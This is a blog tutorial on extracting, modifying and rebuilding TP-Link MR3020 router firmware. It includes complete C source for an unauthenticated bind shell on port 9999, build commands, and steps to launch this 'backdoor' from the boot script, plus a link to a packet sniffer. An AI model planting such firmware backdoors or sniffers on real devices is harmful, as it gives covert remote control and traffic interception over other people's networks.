How to Turn Your Switch into a Snitch

Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.

This post is all about modifying your existing router firmware to perform cool things.

Hardware and Tools Needed:

For the router I am using a TP-Link MR3020. You may use whatever router you like but make sure you won’t brick your device after or while uploading the modified firmware. Also make sure your firmware can be reversed and dumped using the FMK (Firmware Mod Kit).

Download Firmware Mod Kit

If you examine you firmware using Binwalk you will get lots of useful information such as headers, sections, compressions used, etc.

$ binwalk -t -vv ~/mr3020nv1_en_3_17_2_up_boot\(140610\).bin 

Scan Time:     2015-10-12 07:06:11
Target File:   /root/mr3020nv1_en_3_17_2_up_boot(140610).bin
MD5 Checksum:  4e44ca7cdabf7286228b8b4324e3d51a
Signatures:    285

DECIMAL       HEXADECIMAL     DESCRIPTION
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0             0x0             TP-Link firmware header, firmware version: 3.17.2, image version: "ver. 1.0", product ID: 0x30200001, product version: 1, kernel load address: 0x80002000, kernel entry point:
                              0x801D58B0, kernel offset: 512, kernel length: 892221, rootfs offset: 1048576, rootfs length: 2883584, bootloader offset: 0, bootloader length: 48393
14144         0x3740          U-Boot version string, "U-Boot 1.1.4-ge28c8345 (Jun 10 2014 - 17:57:47)"
15488         0x3C80          uImage header, header size: 64 bytes, header CRC: 0xC21F81, created: Tue Jun 10 05:57:48 2014, image size: 33353 bytes, Data Address: 0x80010000, Entry Point: 0x80010000, data CRC:
                              0x2DF367A0, OS: Linux, CPU: MIPS, image type: Firmware Image, compression type: lzma, image name: "u-boot image"
15552         0x3CC0          LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 95584 bytes
131584        0x20200         TP-Link firmware header, firmware version: 3.17.2, image version: "ver. 1.0", product ID: 0x30200001, product version: 1, kernel load address: 0x80002000, kernel entry point:
                              0x801D58B0, kernel offset: 512, kernel length: 892221, rootfs offset: 1048576, rootfs length: 2883584, bootloader offset: 0, bootloader length: 0
132096        0x20400         LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2581428 bytes
1180160       0x120200        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2594041 bytes,  624 inodes, blocksize: 131072 bytes, created: Tue Jun 10 06:04:31 2014

After installing the FMK I will extract my firmware for the MR3020.

$ ./extract-firmware.sh mr3020nv1_en_3_17_2_up_boot\(140610\).bin

Next you will see your extracted firmware inside the fmk directory. You can explore the file system of your router like this.

$ ls
image_parts  logs  rootfs
$ cd rootfs/
$ ls
bin  dev  etc  lib  linuxrc  mnt  proc  root  sbin  tmp  usr  var  web

Inside the “web” directory the source code for the web application for the router running on port 80 can be found. This is an example where I’ve modified the banner of the “top.htm” page.

After your modifications are done use this bash script inside the fmk directory and build the firmware.

$ ./build-firmware.sh

My router uses Busybox. Busybox is a software that provides several stripped-down Unix tools in a single executable file.

$ ls -la
drwxr-xr-x  2 root root   4096 Jun 10  2014 .
drwxrwxr-x 14 root root   4096 Jun 10  2014 ..
-rwxr-xr-x  1 root root 267408 Jun 10  2014 busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 cat -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 chmod -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 date -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 df -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 echo -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 false -> busybox
lrwxrwxrwx  1 root root     83 Oct 12 04:02 iptables-xml -> /data/jenkins/workspace/MR3020-REL/build/../rootfs.build.2.6.31/sbin/iptables-multi
lrwxrwxrwx  1 root root      7 Oct 12 04:02 kill -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 login -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 ls -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 mount -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 msh -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 ping -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 ps -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 rm -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 sh -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 true -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 umount -> busybox

We can first write a simple bind shell and test if it works. For that I have written a simple bind shell in C using fork() so that it can handle multiple clients and won’t be needed to restart the router each time the socket closes 🙂

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SERVER_PORT 9999
 /* CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
  * Bind Shell using Fork for my TP-Link mr3020 router running busybox
  * Arch : MIPS
  * mips-linux-gnu-gcc mybindshell.c -o mybindshell -static -EB -march=24kc
  */
int main() {
	int serverfd, clientfd, server_pid, i = 0;
	char *banner = "[~] Welcome to @OsandaMalith's Bind Shell\n";
	char *args[] = { "/bin/busybox", "sh", (char *) 0 };
	struct sockaddr_in server, client;
	socklen_t len;
	
	server.sin_family = AF_INET;
	server.sin_port = htons(SERVER_PORT);
	server.sin_addr.s_addr = INADDR_ANY; 

	serverfd = socket(AF_INET, SOCK_STREAM, 0);
	bind(serverfd, (struct sockaddr *)&server, sizeof(server));
	listen(serverfd, 1);

    while (1) { 
    	len = sizeof(struct sockaddr);
    	clientfd = accept(serverfd, (struct sockaddr *)&client, &len);
        server_pid = fork(); 
        if (server_pid) { 
        	write(clientfd, banner,  strlen(banner));
	        for(; i < 3 /*u*/; i++) dup2(clientfd, i);
	        execve("/bin/busybox", args, (char *) 0);
	        close(clientfd); 
    	} close(clientfd);
    } return 0;
}

https://github.com/OsandaMalith/TP-Link/blob/master/bindshell.c

Compile using the GCC cross compiler for the MIPS architecture.

$ mips-linux-gnu-gcc -o mybindshell mybindshell.c -static -EB -march=24kc

We give the static option to compile with all external libraries. This is because the router uses busybox and some libraries might not support. The march=24k is according to the CPU model.

Since the size is huge I’ll strip the debugging symbols, etc.

$ mips-linux-gnu-strip –s mybindshell

After that we can place this shell inside the “bin” directory and change the startup script to run our shell after booting. The “rcS” file can be found inside the “/etc/rc.d” folder. This script will help us run our backdoor after everything is in a ready state.

As you can see I have given the shell to run in background after the httpd daemon is executed.

Next build the firmware and update your new firmware 🙂

If I do a very basic nmap scan, you would see port 9999 is listening.

Here you go, my simple bind shell 🙂

You can add a password to restrict access to everyone.

What else can we do? We can do lots of cool things, but remember we have a limited size for everything. Here’s a simple sniffer written by Vivek. https://github.com/OsandaMalith/TP-Link/blob/master/sniffer.c

Compile it, strip it, build the firmware and upload it your device. Put your interface in Promiscuous mode and give the interface and the packet count, I will give br0 which has the default gateway. Here’s a sample output.

Likewise you could lots of cool things with your router. Also check out openwrt. After installing it in your router you can do lots of cool stuff than modifying the existing firmware.

If you are interested in embedded hacking you may have a look at this awesome series on PentesterAcademy Make your own Hacker Gadget.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s